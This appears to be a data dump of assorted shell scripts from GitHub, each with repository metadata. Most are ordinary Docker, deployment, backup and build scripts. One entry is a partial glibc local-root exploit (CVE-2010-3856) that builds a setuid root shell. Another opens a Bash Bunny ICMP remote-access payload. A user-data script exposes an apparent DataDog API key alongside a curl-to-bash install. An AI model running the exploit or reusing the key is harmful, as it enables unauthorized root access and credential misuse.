#!/bin/bash set -e TAG=6.3 build() { NAME=$1 IMAGE=houshuai0816/elk-$NAME:$TAG cd $([ -z "$2" ] && echo "./$NAME" || echo "$2") echo '--------------------------' building $IMAGE in $(pwd) docker build -t $IMAGE . cd - } build base build elastic build filebeat build kibana build logstash buil...
true
59e272169890604cf8ce838adb0dfb0d7c7d531c
Shell
shravankaja/shellscriptPrograms
/day06magic.sh
UTF-8
367
2.96875
3
[]
no_license
#!/bin/bash -x winT=0 winH=0 elv=11 while [ $winT -le $elv ] | [ $winH -le $elv ] do rand=$(($RANDOM%2)) if [ $rand -eq 0 ] then winT=$(( $winT+1 )) if [ $winT -eq $elv] then break fi echo "Tails" else winH=$(( $winH+1 )) if [ $winH -eq $elv] then break ...
true
cd3dd67f9eae0a14b052e2f46565831c7965bdf5
Shell
AngelMarinWolf/Terraform-ECS-XPort-Demo
/environments/development/templates/user-data.sh
UTF-8
685
2.734375
3
[]
no_license
#!/bin/bash echo ECS_CLUSTER=ecs-xport-development >> /etc/ecs/ecs.config ## Installing DataDog Agent ## DD_API_KEY=85f339e1dfe1ddf1b317c167d7994507 bash -c "$(curl -L https://raw.githubusercontent.com/DataDog/datadog-agent/master/cmd/agent/install_script.sh)" usermod -a -G docker dd-agent sed -i -e 's/# logs_enabled...
true
d8f4719a6a076425ee2691d599d3878d296dd2a6
Shell
boguszewski/bwce-alpine-docker
/baseimage/scripts/configuration.sh
UTF-8
2,092
3.171875
3
[ "BSD-3-Clause" ]
permissive
#!/bin/bash # # Copyright 2012 - 2016 by TIBCO Software Inc. # All rights reserved. # # This software is confidential and proprietary information of # TIBCO Software Inc. # # tmp=/tmp #create link for ear cp ${tmp}/*.ear $APPDIR ln -s $APPDIR/*.ear `echo $TIBCO_HOME/tibco.home/bw*/*/bin`/bwapp.ear unzip -q ${tmp}/...
true
c56cf2a6446e5d6a43851ab02b388d554f556582
Shell
ThorQin/tui
/build/build
UTF-8
1,641
2.65625
3
[ "MIT" ]
permissive
#!/bin/bash # ===================================== # CLEAN BUILD # ===================================== rm -rf tui rm -f *.zip # ===================================== # BUILD RELEASE PACKAGE # ===================================== mkdir tui cp -r ../tui tui/tui/ cp -r ../depends tui/depends/ cp ../license tui/ cp ...
true
02364887e9c777008ea4e4842d9edb7884092266
Shell
sandipransing/twinkle_tel
/twinkle_tel
UTF-8
226
3.046875
3
[ "MIT" ]
permissive
#!/bin/sh # # firefox will call twinkle_tel like this: number=`echo "$1" | sed 's/tel://'` if [ $number = disconnect ]; then exec /usr/bin/twinkle --cmd bye else exec /usr/bin/twinkle --call "$number" --immediate fi
true
bd0425c1467f5e5553c88f018f1782a45d731536
Shell
liuwu2/shell.script
/猜数字游戏代码.sh
UTF-8
513
3.9375
4
[]
no_license
#!/bin/bash # 猜数字的游戏,利用秒数生成随机数。 # guessNum=`date|cut -nb 25-26` while : do read -p "请输入一个0-59之间的数字(输入q退出游戏):" num if [ $num = q ] then break fi if [ $num -lt $guessNum ] then echo "你输入的数字比要才的数字小" elif [ $num -gt $guessNum ] then echo "你输入的数字比要猜的数字大" elif [ $num -eq $guessNum ] then echo "恭喜你猜中了" bre...
true
932c0f0c4fe625771cc74d978b1d01894db0274f
Shell
anoaghost/Storage
/localroot/2010/CVE-2010-3856/glibc_nondebian.sh
UTF-8
572
2.734375
3
[]
no_license
#!/bin/sh cat > sh.c << EOF #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { if(argc == 2) { setgid(0); setuid(0); system(argv[1]); } return 0; } EOF gcc sh.c -o sh cat > payload.c << EOF void __attribute__((constructor)) init() { setgid(0); setuid(0); system("chown root:root sh; chmod 4755 sh")...
true
b3b326c39475926efab62dc65fe3c412bde11c5c
Shell
ahurt2000/astart
/putacl
UTF-8
564
3.25
3
[]
no_license
#!/bin/bash # # USE: sudo ./pathtoscript/putacl your_user path_to_project # if path_to_project is not specified is assumed to be called from there # # Author: alejandro hurtado <ahurt2000@gmail.com> # # user running apache daemon APACHEUSER='www-data' USER=${1-`whoami`} PROJECTPATH=${2-} if [ -n "$PROJECTPATH" ]; the...
true
ead74524479f322efeed1214fcb222d8014c4faa
Shell
c4ng4c3ir0/tester
/tester.sh
UTF-8
215
2.6875
3
[]
no_license
#!/bin/bash cd ; cd TesterScanner; echo Digite um nome para o projeto: read pasta mkdir $pasta; cd $pasta; echo Digite a url a ser testada read url; gauplus $url | anew urls | dalfox pipe --silence | anew vulns
true
8fd21391162028cffb2b1cee6ed0debb0ac939d0
Shell
italiangrid/docker-scripts
/base/push-images.sh
UTF-8
388
3.25
3
[]
no_license
#!/bin/bash set -ex tags=${tags:-"centos5 centos6"} if [ -n "${DOCKER_REGISTRY_HOST}" ]; then for t in ${tags}; do docker tag -f italiangrid/base:${t} ${DOCKER_REGISTRY_HOST}/italiangrid/base:${t} docker push ${DOCKER_REGISTRY_HOST}/italiangrid/base:${t} done fi if [ -n "${PUSH_TO_DOCKERHUB}" ]; then f...
true
3994bf9faf803e69a8e1b12abc1491e491fd7233
Shell
new-village-mc/git-mc-backuper
/scripts/backup.sh
UTF-8
1,387
2.890625
3
[]
no_license
git config --global user.name $GIT_NAME git config --global user.email $GIT_EMAIL chown -R root:root /root cd /root # Отключаем автосохранение чанков на диск, чтобы не испортить бекап /root/rcon-cli --host ${RCON_HOST} --port ${RCON_PORT} --password ${RCON_PASSWORD} save-off # Форсированно сохраняем на диск загруженн...
true
33fdf14d99da3d460a4eaf5a539a7d1c6874fe8d
Shell
Geoportail-Luxembourg/geoportailv3
/geoportal/scripts/sync_ms.sh
UTF-8
64
2.75
3
[ "MIT" ]
permissive
scp $1 user@host:/path if [ "$2" = "remove" ] then rm -f $1 fi
true
8d4a8f4f9efcd0a42851d5de08e88f1537ad07a8
Shell
craig-willis/ndslabs-devenvs
/cloud9/docker/entrypoint.sh
UTF-8
394
2.703125
3
[]
no_license
#!/bin/bash set -e if [ "$1" = "docker" ]; then $(which dind) docker daemon \ --host=unix:///var/run/docker.sock \ --host=tcp://0.0.0.0:2375 \ --bip=10.1.0.1/16 \ --mtu=1404 \ --registry-mirror=http://docker-cache.default:5001 \ --storage-driver=vfs > dind.log 2>&1 ...
true
a6afab6b33f43904eefe248071c4a12214311e9e
Shell
eholtz/terrarium_pie
/script/times_daylight.sh
UTF-8
1,578
3.703125
4
[ "Apache-2.0" ]
permissive
#!/bin/bash # be sure to be in utc mode TZ="UTC" export TZ file_today="$dir_volatile/times_$(date +%Y%m%d)" file_times="$dir_volatile/times" file_epoch="$dir_volatile/times_epoch" if [ ! -f $file_today ] ; then echo "File $file_today not found => assuming new day or reboot" echo "Cleaning up ..." rm -f $dir_vo...
true
d3f4623e57791805a5d2ecf50c0efe182475aa2b
Shell
yangjinheng/fabric-sample-raft
/default/resources/explorer-artifacts/postgreSQL/db/createdb.sh
UTF-8
1,522
3.75
4
[]
no_license
#!/bin/bash # SPDX-License-Identifier: Apache-2.0 echo "Copying ENV variables into temp file..." node processenv.js if [ $(jq .DATABASE_USERNAME /tmp/process.env.json) == null ]; then export USER=$(jq .postgreSQL.username ../../../../explorerconfig.json) else export USER=$(jq .DATABASE_USERNAME /tmp/process...
true
f6f2d5ef8ff3bf6fff5856ac8545ba0249fa227f
Shell
Kao-PMP/Kao-Harmonization-Release
/bin/check.sh
UTF-8
767
3.0625
3
[ "Apache-2.0" ]
permissive
for STUDY in "${STUDY_NAMES[@]}" do echo "build.sh: CHECK $DBNAME $STUDY " STUDY_LOWER=$(echo "$STUDY" | tr '[:upper:]' '[:lower:]') LOG_FILE=consistency_${STUDY_LOWER}.log ./HeartData/consistency.py $DBNAME $USER $STUDY &> $LOG_FILE if [[ $? > 0 ]]; then echo...
true
e645c1e27e3f5e53463ee56e9b2adcf3e8cc4ff5
Shell
lalittayade1996/SHELL_PROGRAMING
/Selection-statement/elif1.sh
UTF-8
330
3.296875
3
[]
no_license
#!/bin/bash -x read -p 'ENTER ANY NUMBER (0-5) - ' num if [ "$num" = "0" ]; then echo "ZERO" elif [ "$num" = "1" ]; then echo "ONE" elif [ "$num" = "2" ]; then echo "TWO" elif [ "$num" = "3" ]; then echo "THREE" elif [ "$num" = "4" ]; then echo "FOUR" elif [ "$num" = "5" ]; then echo "FIVE" else echo " INVALI...
true
500eb23a77c273c591e11ac0e8f25bec05f5e006
Shell
smithbwatGW/Senior-Design-ALPRN
/Testing/plate reading/platerun.sh
UTF-8
230
3.421875
3
[]
no_license
#!/bin/bash CONTENT=`ls *.{JPG,jpg,gif,png}` OUTPUT="Output-$(date +"%m-%d-%Y--%T").txt" echo $OUTPUT 1>$OUTPUT for b in $CONTENT ; do echo $b ALPROUT=`alpr -n 3 $b` printf "$b $ALPROUT" 1>>$OUTPUT printf "\n" 1>>$OUTPUT done
true
b5d2458e122413b1c6d09de47d8c7f4138c29e54
Shell
mcpcpc/irc2
/irc2
UTF-8
751
3.546875
4
[ "MIT" ]
permissive
#!/bin/sh # # Usage: $0 [<server>] [<port>] [<nick>] [<username>] [<realname>] [ -z "$NCIRC" ] && { fd="/tmp/.irc2"; rm -f "$fd"; mkfifo "$fd" nc "${1:-irc.libera.chat}" "${2:-6667}" <"$fd" | \ NCIRC=1 exec "$0" "$@" >"$fd" } trap 'kill 0' EXIT HUP INT printf 'NICK %s\r\n' "${nick:=${3:-$(id -un)}}" printf 'USER ...
true
443d4bbdf1fa82e5c39547e41283c3716d9b5323
Shell
awesomebytes/ros_prefix_docker
/kinetic_ros_base_image/push.sh
UTF-8
272
2.609375
3
[]
no_license
#!/bin/bash set -ve # Need to have Docker logged in (docker login) image_id=$(docker images | grep ros_prefix_kinetic_ros_base | awk '{print $1}') docker tag $image_id awesomebytes/ros_prefix_kinetic_ros_base:latest docker push awesomebytes/ros_prefix_kinetic_ros_base
true
196fd0272bcf3413d485277656f231b115631744
Shell
marvinoeben/elastic-image
/install-gradle-centos.sh
UTF-8
605
3.078125
3
[]
no_license
#!/bin/bash cd /root gradle_package=`curl -s http://services.gradle.org/distributions --list-only | sed -n 's/.*\(gradle-.*.all.zip\).*/\1/p' | egrep -v "milestone|rc" | head -1` gradle_version=`echo ${gradle_package} | cut -d "-" -f 1,2` mkdir /opt/gradle curl -L -Of http://services.gradle.org/distributions/${gradle_p...
true
26dbe1f5f1185e6cda0703d6e5557082f81bf67d
Shell
Boffmann/ReactDashboard
/createDB.sh
UTF-8
423
2.875
3
[]
no_license
#!/bin/bash dbFile='./src/backend/database/dashboard.db' if [ -f "$dbFile" ]; then echo "Database file already exists" echo "Deleting database file..." rm $dbFile fi echo "Creating new database..." touch $dbFile sqlite3 $dbFile "CREATE TABLE corona(timestamp, name, count, weekIncidence, casesPer100k, deaths, R...
true
889c6f6624ff0dcbaf268dfe39ddc4c39594f2aa
Shell
maufia/tmux-conf
/run_tmux.sh
UTF-8
925
3.296875
3
[]
no_license
#!/bin/bash TMUX="TERM=screen-256color tmux -2 $@" echo 'List of existing sessions:' echo '(attach with: "tmux attach -t #")' tmux list-sessions #SESSIONS=/usr/bin/tmux ls -F '#{session_id}: #{?session_attached,1 (attached),0 (not attached)}; created: #{session_created_string}' #echo "$SESSIONS" #{ #echo '$line' #} # ...
true
ac46a7538b6921335f4e869596f54b857732cb6d
Shell
Phillip-a-richmond/Yeast-Ty1-TIPseq-Analysis
/PROCESSING_SCRIPTS/FullPipeline_20190521_Boeke.sh
UTF-8
3,713
3.1875
3
[]
no_license
#!/bin/bash #SBATCH --account=def-wyeth ## Mail Options #SBATCH --mail-user=prichmond@cmmt.ubc.ca #SBATCH --mail-type=ALL ## CPU Usage #SBATCH --mem=100G #SBATCH --cpus-per-task=32 #SBATCH --time=4-0:00 #SBATCH --nodes=1 ## Output and Stderr #SBATCH --output=%x-%j.out #SBATCH --error=%x-%j.error #SBATCH --array=0-...
true
722ddb7deb965e61dfcd832f35161ae8b22ffb38
Shell
gvsurenderreddy/raslink
/AllStar-build/debian/update-stage2.sh
UTF-8
4,576
3.015625
3
[]
no_license
#!/bin/bash # update-stage2.sh - Update the system # Stage Two # Copyright (C) 2018 Jeremy Lincicome (W0JRL) # https://jlappliedtechnologies.com admin@jlappliedtechnologies.com # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as...
true
b9ab351afc617990e3cffbb25185e4f733bb81df
Shell
orenovadia/env
/sources/python.sh
UTF-8
500
3.296875
3
[]
no_license
#!/usr/bin/env bash alias pycharm="/opt/pycharm/bin/pycharm.sh>/dev/null" alias del_pyc="find . -name '*pyc' -delete" function prun() { # this function run a python module using python2 by its filename # remove .py module=${1%.py} # replace slashes by dots module=${module//\//...
true
5b5ad9445fea8205285c07996ba81fad50b9f8e7
Shell
minhajuddin/dotfiles
/.bash_completion.d/t.bash
UTF-8
342
2.671875
3
[]
no_license
#!/bin/sh # rake bash completion script __complete_taskr(){ echo "$0" >> /tmp/completion.log echo "$1" >> /tmp/completion.log echo "$2" >> /tmp/completion.log echo "$3" >> /tmp/completion.log /home/minhajuddin/.scripts/t -i "$2" } #complete_cr_command() { #ls ~/repos/ | grep "^$2" #} complete -C __comple...
true
021773910311c077fb1aadf2883b6a4686d5fab6
Shell
hak5/bashbunny-payloads
/payloads/library/remote_access/PingZhellBunny/payload.txt
UTF-8
917
2.921875
3
[]
no_license
#!/bin/bash # # Title: PingZhellBunny # Description: Getting remote access via ICMP # Author: 0iphor13 # Version: 1.5 # Category: Remote_Access # Attackmodes: HID, RNDIS_ETHERNET LED SETUP ATTACKMODE RNDIS_ETHERNET HID GET SWITCH_POSITION GET HOST_IP cd /root/udisk/payloads/$SWITCH_POSI...
true
895f1478e59c1bac89307c4c90d6d240692bc8bc
Shell
btilton/gam-scripts
/autorespond.sh
UTF-8
3,409
4.09375
4
[]
no_license
#!/bin/bash ############################### # Author: Brian Tilton # Date : 2015-06-26 # Title : autorespond.sh # Desc : Script to reactivate A Google Apps account and then # : set a 50 year away message using GAM ################################ ##### INIT VARIABLES ##### # Change this to point to your ga...
true
b9622de869fe30623813b019f191bb3394346822
Shell
xuyinhao/lgpbenchmark
/loongoopBench/api/bin/chown/case/3-1
UTF-8
327
2.515625
3
[]
no_license
#!/bin/sh userdel chownU3-1 2>/dev/null useradd chownU3-1 2>/dev/null filedir="$apiPath/chown3-1/a/b/c" filePath="$filedir/chown3-1" $mkdir -p $filedir 2>/dev/null $touchz $filePath 2>/dev/null $chown "chownU3-1:root" $filePath 2>/dev/null checkOkNeedWinacl $? "chownU3-1:root" $filePath userdel -rf chownU3-1 2>/de...
true
14dbf84dae9aa5ae59a0e68b8045e1067d88919d
Shell
aiguofer/dotfiles
/user/.local/bin/watch_sleep
UTF-8
317
2.703125
3
[]
no_license
#!/bin/bash dbus-monitor --system "type='signal',interface='org.freedesktop.login1.Manager',member=PrepareForSleep" | while read x; do case "$x" in *"boolean false"*) systemctl --user --no-block stop sleep.target;; *"boolean true"*) systemctl --user --no-block start sleep.target;; esac done
true
51c6b9bda5abf08a20420b5f8b0bc5fa60c11aea
Shell
fidoedidoe/build_scripts
/build_aosp_7-1-0_nexus7.sh
UTF-8
4,623
3.65625
4
[]
no_license
#!/bin/bash ### ### USAGE: ### ./build_aosp_7-1-0_nexus7.sh <device> ### where device can be one of: tilapia;grouper ### ie: ./build_lineage_14-1_GT-N51X0.sh tilapia ### ### NOTE: ### you may need to modify the variables below to better suit your personal build environment ### #GITHUB_USER="AndDiSa" GITHUB_USER=...
true
4cf68d378865e93f5233aae6e6428265b0746c69
Shell
bitbaba/bitmail
/depends/backup/qrencode.sh
UTF-8
1,073
3.21875
3
[ "BSD-3-Clause" ]
permissive
#!/bin/bash if [ x$(uname -s) = x"Darwin" ]; then alias readlink='greadlink' fi #DepSrcRoot=$(dirname $(readlink -f $0) ) DepSrcRoot=~/workspace/github/bitmail/depends #$(dirname $(readlink -f $0) ) OutDir=$DepSrcRoot/../out #================================================== cd $DepSrcRoot TARBALL="qrencode-3.4.4.t...
true
70190ace2bd5a23df173a6a76e5db820b334fb34
Shell
m23project/mdk-devel
/mdk/m23Debs/m23-initscripts/debian/etc/init.d/hwcheck
UTF-8
8,175
3.6875
4
[]
no_license
#!/bin/bash ### BEGIN INIT INFO # Provides: hwcheck # Required-Start: $local_fs $syslog # Required-Stop: $local_fs $syslog # Default-Start: S # Default-Stop: # X-Interactive: true # Short-Description: Checks for new hardware. ### END INIT INFO # /KNOPPIX/etc/init.d/knoppix-autoconfig # Basic sy...
true
bb7f9b75aab3f2c508f29263e43410fcc43d512d
Shell
fuboat/CVE-project-install-script
/install-libpng.sh
UTF-8
852
2.6875
3
[]
no_license
#!/bin/sh # target exec file: ./libpng/contrib/pngminus/pnm2png rm -rf libpng git clone https://github.com/glennrp/libpng.git cd libpng || exit git checkout tags/v1.6.34 -f git clean -xfd export LDFLAGS=$LDFLAGS" -lz" ./autogen.sh ./configure make cd contrib/pngminus/ || exit sed -i '5s/.*//' makefile.std sed -i ...
true
2c40cc3310ec9f2f2da071f45e283ae44d256421
Shell
Zesystem/hdqn-wxweb
/deploy.sh
UTF-8
930
3.1875
3
[]
no_license
#!/bin/bash echo 'Starting to deploy hdqnwxweb service ...' BASEPATH=$(cd `dirname $0`; pwd) echo '==>Deploying from path: $BASHPATH ...' echo '==>Copying file: $BASEPATH/conf/default.conf to: /etc/nginx/conf.d/default.conf ...' cp $BASEPATH/conf/default.conf /etc/nginx/conf.d/default.conf echo '==>Copying file: $BASE...
true
19e45707dcfdd331c26eeeb7eafcdb9a7f357e75
Shell
astrolabsoftware/sparkioref
/run_benchmarks_local.sh
UTF-8
1,357
2.890625
3
[ "Apache-2.0" ]
permissive
#!/bin/bash # Copyright 2018 Julien Peloton # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distri...
true
01d914c60d513a8dda80679579c4259c7836dc31
Shell
kgyrtkirk/cad
/src/texturepack.bash
UTF-8
5,179
2.71875
3
[]
no_license
#!/bin/bash -e #grep MAIN eloszoba.md |sort|uniq -c|tr '*;"' ' '|awk '{print "x",$5,$1,$6,$7}' set -e function t() { label=$1 n=$2 w=$3 h=$4 x $label $n $h $w } function x() { label=$1 n=$2 w=$3 h=$4 echo "$label n:$n w:$w h:$h" # convert rose: -resize ${w}x${h}! \ # -gravity center -annotate 0 "...
true